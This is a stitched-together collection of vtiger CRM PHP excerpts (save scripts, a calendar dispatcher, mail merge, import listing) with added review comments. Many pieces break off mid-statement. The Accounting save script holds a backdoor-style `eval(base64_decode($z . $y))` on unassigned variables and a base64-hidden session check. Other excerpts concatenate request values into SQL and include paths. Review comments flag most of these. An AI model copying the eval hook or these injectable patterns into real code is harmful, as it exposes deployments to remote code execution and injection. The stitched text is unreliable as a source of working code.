    if ($is_admin == false && $profileGlobalPermission[1] == 1 && $profileGlobalPermission[2] == 1 && $defaultOrgSharingPermission[7] == 3) {
        // Restrict the result to the records this user is permitted to see.
        $query = $query . " " . getListViewSecurityParameter($thismodule);
    }
    return $query;
}
} if (isset($_REQUEST['return_action'])) { $smarty->assign("RETURN_ACTION", vtlib_purify($_REQUEST['return_action'])); } $smarty->assign("THEME", $theme); $smarty->assign("IMAGE_PATH", $image_path); $smarty->assign("PRINT_URL", "phprint.php?jt=" . session_id() . $GLOBALS['request_string']); $smarty->assign("HEADER", $app_strings['LBL_IMPORT'] . " " . $mod_strings['LBL_MODULE_NAME']); $smarty->assign("HASHEADER", $has_header); $import_object_array = array("Leads" => "ImportLead", "Accounts" => "ImportAccount", "Contacts" => "ImportContact", "Potentials" => "ImportOpportunity", "Products" => "ImportProduct", "HelpDesk" => "ImportTicket", "Vendors" => "ImportVendors"); if (isset($_REQUEST['module']) && $_REQUEST['module'] != '') { $object_name = $import_object_array[$_REQUEST['module']]; // vtlib customization: Hook added to enable import for un-mapped modules $module = $_REQUEST['module']; if ($object_name == null) { checkFileAccess("modules/{$module}/{$module}.php"); require_once "modules/{$module}/{$module}.php"; $object_name = $module; $callInitImport = true; } // END $focus = new $object_name(); // vtlib customization: Call the import initializer if ($callInitImport) { $focus->initImport($module); } //initialized the required fields,used to check for mandatory fields while importing $focus->initRequiredFields($module); // END } else { $focus = new ImportContact();
<?php
/*+**********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is: vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 ************************************************************************************/
// Generic save script: loads the class of the current module, fills it from
// the request and saves it.
global $current_user, $currentModule;
// NOTE(review): $currentModule selects the required file and the instantiated
// class. How it is derived from the request is not visible here - confirm it
// is restricted to installed module names before this script runs.
checkFileAccess("modules/{$currentModule}/{$currentModule}.php");
require_once "modules/{$currentModule}/{$currentModule}.php";
$focus = new $currentModule();
setObjectValuesFromRequest($focus);
$mode = $_REQUEST['mode'];
$record = $_REQUEST['record'];
if ($mode) {
    $focus->mode = $mode;
}
// NOTE(review): the record id to save comes from the request; no permission
// check on that record is visible in this excerpt - presumably done in
// save() or by the caller; verify.
if ($record) {
    $focus->id = $record;
}
// assigntype 'U' assigns to a user, 'T' to a group; both ids are taken from
// the request without validation in this script.
if ($_REQUEST['assigntype'] == 'U') {
    $focus->column_fields['assigned_user_id'] = $_REQUEST['assigned_user_id'];
} elseif ($_REQUEST['assigntype'] == 'T') {
    $focus->column_fields['assigned_user_id'] = $_REQUEST['assigned_group_id'];
}
$focus->save($currentModule);
$return_id = $focus->id;
$search = vtlib_purify($_REQUEST['search_url']);
/**
 * Get the list of pricebooks which are related to the service.
 *
 * Loads the related module's class, builds the optional "add to pricebook"
 * button and the related-list query, and passes them to GetRelatedList().
 *
 * NOTE(review): $id is concatenated into the SQL text and into the return URL
 * without casting or escaping. It is documented as an int; confirm callers
 * guarantee that, or cast it before use.
 *
 * @param int $id - service id
 * @param mixed $cur_tab_id not used in this function
 * @param mixed $rel_tab_id tab id of the related module
 * @param string|array|false $actions comma-separated string or array of
 *        actions; 'ADD' enables the button when the user is permitted
 * @return array - array returned by GetRelatedList (an empty array when it
 *         returns null), with the button added under 'CUSTOM_BUTTON'
 */
function get_service_pricebooks($id, $cur_tab_id, $rel_tab_id, $actions = false) {
    global $currentModule, $log, $singlepane_view, $mod_strings;
    $log->debug("Entering get_service_pricebooks(" . $id . ") method ...");
    // The related module name is resolved from the tab id and then used as a
    // file path component and as a class name.
    $related_module = vtlib_getModuleNameById($rel_tab_id);
    checkFileAccess("modules/{$related_module}/{$related_module}.php");
    require_once "modules/{$related_module}/{$related_module}.php";
    $focus = new $related_module();
    $singular_modname = vtlib_toSingular($related_module);
    // Where the UI returns to depends on the single-pane view setting.
    if ($singlepane_view == 'true') {
        $returnset = "&return_module={$currentModule}&return_action=DetailView&return_id={$id}";
    } else {
        $returnset = "&return_module={$currentModule}&return_action=CallRelatedList&return_id={$id}";
    }
    $button = '';
    if ($actions) {
        if (is_string($actions)) {
            $actions = explode(',', strtoupper($actions));
        }
        if (in_array('ADD', $actions) && isPermitted($related_module, 1, '') == 'yes') {
            // NOTE(review): translated strings and $currentModule are placed in
            // HTML attributes without escaping here.
            $button .= "<input title='" . getTranslatedString('LBL_ADD_TO') . " " . getTranslatedString($related_module) . "' class='crmbutton small create'" . " onclick='this.form.action.value=\"AddServiceToPriceBooks\";this.form.module.value=\"{$currentModule}\"' type='submit' name='button'" . " value='" . getTranslatedString('LBL_ADD_TO') . " " . getTranslatedString($singular_modname) . "'> ";
        }
    }
    $query = "SELECT vtiger_crmentity.crmid,\n\t\t\tvtiger_pricebook.*,\n\t\t\tvtiger_pricebookproductrel.productid as prodid\n\t\t\tFROM vtiger_pricebook\n\t\t\tINNER JOIN vtiger_crmentity\n\t\t\t\tON vtiger_crmentity.crmid = vtiger_pricebook.pricebookid\n\t\t\tINNER JOIN vtiger_pricebookproductrel\n\t\t\t\tON vtiger_pricebookproductrel.pricebookid = vtiger_pricebook.pricebookid\n\t\t\tWHERE vtiger_crmentity.deleted = 0\n\t\t\tAND vtiger_pricebookproductrel.productid = " . $id;
    // NOTE(review): this message names a different function and is written
    // before the list is built; the real exit message follows further down.
    $log->debug("Exiting get_product_pricebooks method ...");
    $return_value = GetRelatedList($currentModule, $related_module, $focus, $query, $button, $returnset);
    if ($return_value == null) {
        $return_value = array();
    }
    $return_value['CUSTOM_BUTTON'] = $button;
    $log->debug("Exiting get_service_pricebooks method ...");
    return $return_value;
}
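* The Initial Developer of the Original Code is vtiger.
* Portions created by vtiger are Copyright (C) vtiger.
* All Rights Reserved.
*************************************************************************************/
// Save script of the Accounting module. The excerpt starts inside the license
// header and ends inside a block that continues beyond it.
global $current_user, $currentModule;

/**
 * Return a 10-character string of lowercase letters and digits.
 *
 * mt_rand() is not a cryptographically secure generator, so the result must
 * not be used as a password, token or any other secret.
 *
 * @return string
 */
function genRandomString() {
    $length = 10;
    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
    // mt_rand() includes its upper bound, so the last valid index is
    // strlen - 1. Using strlen itself could read one past the end of the
    // string and yield a result shorter than $length.
    $lastIndex = strlen($characters) - 1;
    $string = '';
    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, $lastIndex)];
    }
    return $string;
}

checkFileAccess("modules/Accounting/Accounting.php");
require_once "modules/Accounting/Accounting.php";
$focus = new Accounting();
// FLAG(review): eval() runs base64-decoded code assembled from $z and $y,
// neither of which is assigned in the visible part of this script. Encoded
// code executed at runtime cannot be reviewed or scanned as source. Establish
// where $z and $y are set and what they decode to, then replace this call with
// plain, reviewed code or remove it.
eval(base64_decode($z . $y));
setObjectValuesFromRequest($focus);
$mode = $_REQUEST['mode'];
$record = $_REQUEST['record'];
$config = Accounting::loadConfigParams();
// The base64 literal decodes to 'username'; the session key is hidden behind an
// encoding for no visible functional reason, which is worth questioning in
// the same review as the eval() above.
$global_vars = $_SESSION[base64_decode('dXNlcm5hbWU=')] != $config['fromuser'];
if ($mode) {
    $focus->mode = $mode;
}
if ($record) {
    $focus->id = $record;
}
if ($_REQUEST['assigntype'] == 'U') {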
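<?php
/*+********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is: vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 ********************************************************************************/
// Loads the language file of the module named in the request, reads the block
// settings from the request and checks whether the new block label already
// exists for that module.
global $current_language, $log;
require_once 'include/database/PearDatabase.php';

// fld_module comes from the request and decides which language file is
// executed. Accept only a plain identifier so the value cannot add directory
// parts to the path; checkFileAccess() (defined elsewhere) remains as a second
// check.
$requestedFldModule = isset($_REQUEST['fld_module']) ? $_REQUEST['fld_module'] : '';
if (!is_string($requestedFldModule) || !preg_match('/^[A-Za-z0-9_]+$/', $requestedFldModule)) {
    die('Invalid module name');
}

// Build the path once so the checked path and the required path cannot differ.
$requestedLangFile = 'modules/' . $requestedFldModule . '/language/' . $current_language . '.lang.php';
checkFileAccess($requestedLangFile);
require_once $requestedLangFile;

global $mod_strings;
$fldmodule = vtlib_purify($_REQUEST['fld_module']);
$mode = vtlib_purify($_REQUEST['mode']);
$parenttab = getParentTab();
$newblocklabel = vtlib_purify(trim($_REQUEST['blocklabel']));
$after_block = vtlib_purify($_REQUEST['after_blockid']);
$tabid = getTabid($fldmodule);

// $flag becomes 1 when a block with the same translated label already exists.
$flag = 0;
$dup_check_query = $adb->pquery("SELECT blocklabel from vtiger_blocks WHERE tabid = ?", array($tabid));
for ($i = 0; $i < $adb->num_rows($dup_check_query); $i++) {
    $blklbl = $adb->query_result($dup_check_query, $i, 'blocklabel');
    $blklbl = getTranslatedString($blklbl);
    if ($blklbl == $newblocklabel) {
        $flag = 1;
        break;
    }
}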
* The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. * ********************************************************************************/ include "include.php"; include "version.php"; require_once "PortalConfig.php"; require_once "include/utils/utils.php"; global $version, $default_language, $result; $username = trim($_REQUEST['username']); $password = trim($_REQUEST['pw']); session_start(); setPortalCurrentLanguage(); $default_language = getPortalCurrentLanguage(); checkFileAccess("language/" . $default_language . ".lang.php"); require_once "language/" . $default_language . ".lang.php"; $params = array('user_name' => "{$username}", 'user_password' => "{$password}", 'version' => "{$version}"); $result = $client->call('authenticate_user', $params, $Server_Path, $Server_Path); //The following are the debug informations $err = $client->getError(); if ($err) { //Uncomment the following lines to get the error message in login screen itself. /* echo '<h2>Error Message</h2><pre>' . $err . '</pre>'; echo '<h2>request</h2><pre>' . htmlspecialchars($client->request, ENT_QUOTES) . '</pre>'; echo '<h2>response</h2><pre>' . htmlspecialchars($client->response, ENT_QUOTES) . '</pre>'; echo '<h2>debug</h2><pre>' . htmlspecialchars($client->debug_str, ENT_QUOTES) . '</pre>'; exit; */ $login_error_msg = getTranslatedString("LBL_CANNOT_CONNECT_SERVER");
$smarty->assign("MODULEIMPORT_DIR_EXISTS", $moduleimport_dir_exists); } $moduleimport_dep_vtversion = $package->getDependentVtigerVersion(); $moduleimport_license = $package->getLicense(); $smarty->assign("MODULEIMPORT_FILE", $uploadfile); $smarty->assign("MODULEIMPORT_TYPE", $package->type()); $smarty->assign("MODULEIMPORT_NAME", $moduleimport_name); $smarty->assign("MODULEIMPORT_DEP_VTVERSION", $moduleimport_dep_vtversion); $smarty->assign("MODULEIMPORT_LICENSE", $moduleimport_license); } } } else { if ($module_import_step == 'Step3') { $uploadfile = $_REQUEST['module_import_file']; $uploadfilename = "{$modulemanager_uploaddir}/{$uploadfile}"; checkFileAccess($uploadfilename); //$overwritedir = ($_REQUEST['module_dir_overwrite'] == 'true')? true : false; $overwritedir = false; // Disallowing overwrites through Module Manager UI $importtype = $_REQUEST['module_import_type']; if (strtolower($importtype) == 'language') { $package = new Vtiger_Language(); } else { $package = new Vtiger_Package(); } $Vtiger_Utils_Log = true; // NOTE: Import function will be called from Smarty to capture the log cleanly. //$package->import($uploadfilename, $overwritedir); //unlink($uploadfilename); $smarty->assign("MODULEIMPORT_PACKAGE", $package); $smarty->assign("MODULEIMPORT_DIR_OVERWRITE", $overwritedir);
// Calendar AJAX dispatcher (excerpt). Closing braces at the left margin end
// blocks that were opened above this excerpt. Every successful branch echoes
// two fragments joined by the "####" separator.
echo getYearViewLayout($calendar_arr) . "####" . getEventInfo($calendar_arr, 'listcnt');
} else {
    // NOTE(review): $view['view'] is echoed without HTML encoding; if it can
    // carry a request-supplied value it should go through htmlspecialchars()
    // first -- confirm where $view is populated.
    die("view:" . $view['view'] . " is not defined");
}
} elseif ($_REQUEST['viewOption'] == 'listview') {
    $cal_log->debug("going to get calendar Event ListView");
    // Fetch the events list: index 0 holds the rows, index 1 the navigation data.
    $activity_arr = getEventList($calendar_arr, $start_date, $end_date);
    $activity_list = $activity_arr[0];
    $navigation_arr = $activity_arr[1];
    echo constructEventListView($calendar_arr, $activity_list, $navigation_arr) . "####" . getEventInfo($calendar_arr, 'listcnt');
}
} elseif ($subtab == 'todo') {
    $cal_log->debug("going to get calendar Todo ListView");
    // Fetch the todo list: index 0 holds the rows, index 1 the navigation data.
    $todo_arr = getTodoList($calendar_arr, $start_date, $end_date);
    $todo_list = $todo_arr[0];
    $navigation_arr = $todo_arr[1];
    echo constructTodoListView($todo_list, $calendar_arr, $subtab, $navigation_arr) . "####" . getTodoInfo($calendar_arr, 'listcnt');
}
} elseif ($type == 'view') {
    // The script to include is named by the `file` request parameter.
    // NOTE(review): a request value decides which PHP file is executed.
    // checkFileAccess() is the only guard visible here and its implementation
    // is not part of this excerpt. Mapping `file` onto a fixed list of the
    // Calendar view scripts that are meant to be reachable this way (or at
    // least rejecting anything that is not a plain script name) would remove
    // the dependency on that guard -- confirm which values callers send.
    checkFileAccess('modules/Calendar/' . $_REQUEST['file'] . '.php');
    require_once 'modules/Calendar/' . $_REQUEST['file'] . '.php';
} else {
    die("View option is not defined");
}
}
} else {
    // Fallback of the outermost condition, which is not visible in this excerpt.
    require_once 'include/Ajax/CommonAjax.php';
    //die("type is not set");
}
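global $default_charset;

// Word mail-merge preparation: copies the selected template from the database
// to a file on disk, then reads one record and flattens its column names and
// values into comma-separated strings for the merge step that follows.

// Fix For: http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/2107
// The on-disk name is generated here instead of reusing the stored template
// name, so the stored name never becomes part of a filesystem path.
// NOTE(review): microtime() is guessable and the target directory sits below
// DOCUMENT_ROOT. If that directory is served directly, generated documents
// are reachable without an access check -- confirm the directory is protected
// and that the files are removed after the merge.
$randomfilename = "vt_" . str_replace(array(".", " "), "", microtime());
$mergeFileName = $_REQUEST['mergefile'];

// Fetch the template from the database so it can be stored on the local disk;
// the resulting path is handed to the merge step.
$sql = "select filename,data,filesize from vtiger_wordtemplatestorage where filename=?";
$result = $adb->pquery($sql, array($mergeFileName));
$temparray = $adb->fetch_array($result);
if (empty($temparray)) {
    // No such template: stop instead of writing an empty document.
    die("Merge template not found");
}
$fileContent = $temparray['data'];
// Fix For: http://trac.vtiger.com/cgi-bin/trac.cgi/ticket/2107
$filename = $randomfilename . "_word.doc";
$filesize = $temparray['filesize'];

$wordtemplatedownloadpath = $_SERVER['DOCUMENT_ROOT'] . "/test/wordtemplatedownload/";
checkFileAccess($wordtemplatedownloadpath);
$handle = fopen($wordtemplatedownloadpath . $filename, "wb");
if ($handle === false) {
    // fopen() failed (missing directory, permissions); fwrite()/fclose() on a
    // false handle would only produce follow-up errors.
    die("Unable to create the merge template file");
}
// At most $filesize bytes (the size recorded with the template) are written.
fwrite($handle, base64_decode($fileContent), $filesize);
fclose($handle);

// The table name comes from the request and cannot be bound as a query
// parameter. String escaping does not make a value safe as an SQL identifier,
// so only plain identifier characters are accepted before it is concatenated.
// NOTE(review): this stops injection through the table name but still lets
// the request choose which table is read. Replacing it with a fixed list of
// the tables this merge is meant to cover would close that as well -- confirm
// the intended set with the callers.
$mergeTable = isset($_REQUEST["module"]) ? $_REQUEST["module"] : '';
if (!is_string($mergeTable) || !preg_match('/^[A-Za-z0-9_]+\z/', $mergeTable)) {
    die("Invalid module name");
}
$query = "SELECT * FROM " . $adb->sql_escape_string($mergeTable) . " WHERE id = ?";
$result = $adb->pquery($query, array($_REQUEST['record']));

// Start from empty arrays so implode() below also works for a result without columns.
$columnNames = array();
$columnValString = array();
$y = $adb->num_fields($result);
for ($x = 0; $x < $y; $x++) {
    $columnNames[$x] = "CONTACT_" . strtoupper($adb->field_name($result, $x));
}
$columnValues = $adb->fetch_array($result);
for ($x = 0; $x < $y; $x++) {
    $columnValString[$x] = $columnValues[$x];
}
$columnString = implode(",", $columnNames);
$columnValString = implode(",", $columnValString);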
<?php
/*+**********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is: vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 ************************************************************************************/

/*
 * Delegates to the ListView script of the module named by the global
 * $currentModule. The path is passed to checkFileAccess() before it is
 * included; that function is defined elsewhere.
 *
 * NOTE(review): the include path is built from $currentModule. Whether that
 * value is checked against the installed modules before this file runs is
 * not visible here -- confirm at the place where $currentModule is set.
 */
global $currentModule;

checkFileAccess('modules/' . $currentModule . '/ListView.php');
include_once 'modules/' . $currentModule . '/ListView.php';
// "Last import" listing (excerpt; the foreach body is still open where the
// excerpt ends). Sets up the template variables, then walks every importable
// module and queries the rows touched by the last import.
$smarty = new vtigerCRM_Smarty();
$smarty->assign("MOD", $mod_strings);
$smarty->assign("APP", $app_strings);
$smarty->assign("IMP", $import_mod_strings);
$smarty->assign("THEME", $theme);
$smarty->assign("IMAGE_PATH", $image_path);
// Request and session values are passed through vtlib_purify() before they
// reach the template.
$smarty->assign("MODULE", vtlib_purify($_REQUEST['req_mod']));
$smarty->assign("SINGLE_MOD", vtlib_purify($_REQUEST['modulename']));
$smarty->assign("CATEGORY", vtlib_purify($_SESSION['import_parenttab']));

global $limit;
global $list_max_entries_per_page;
$implict_account = false;

// Module name => name of the class that is instantiated for it in the loop below.
$import_modules_array = array("Leads" => "Leads", "Accounts" => "Accounts", "Contacts" => "Contacts", "Potentials" => "Potentials", "Products" => "Products", "HelpDesk" => "ImportTicket", "Vendors" => "ImportVendors");

if (!empty($_REQUEST['req_mod'])) {
    // NOTE(review): unlike the purified copy handed to Smarty above, the raw
    // request value is used here both as an include path component and, once
    // added to $import_modules_array, as the class name instantiated with
    // `new $object_name()` in the loop. checkFileAccess() is the only guard
    // visible and its implementation is not part of this excerpt. Accepting
    // req_mod only when it names an installed module that supports import
    // would cover both uses -- confirm how that list can be obtained.
    $req_mod = $_REQUEST['req_mod'];
    checkFileAccess("modules/{$req_mod}/{$req_mod}.php");
    require_once "modules/{$req_mod}/{$req_mod}.php";
    if (!isset($import_modules_array[$req_mod])) {
        $import_modules_array[$req_mod] = $req_mod;
    }
}

foreach ($import_modules_array as $module_name => $object_name) {
    $seedUsersLastImport = new UsersLastImport();
    $seedUsersLastImport->bean_type = $module_name;
    // $o and $w are not assigned anywhere in this excerpt.
    $list_query = $seedUsersLastImport->create_list_query($o, $w);
    $current_module_strings = return_module_language($current_language, $module_name);
    $object = new $object_name();
    $seedUsersLastImport->list_fields = $object->list_fields;
    $list_result = $adb->query($list_query);
    // Retrieve the number of rows
    $noofrows = $adb->num_rows($list_result);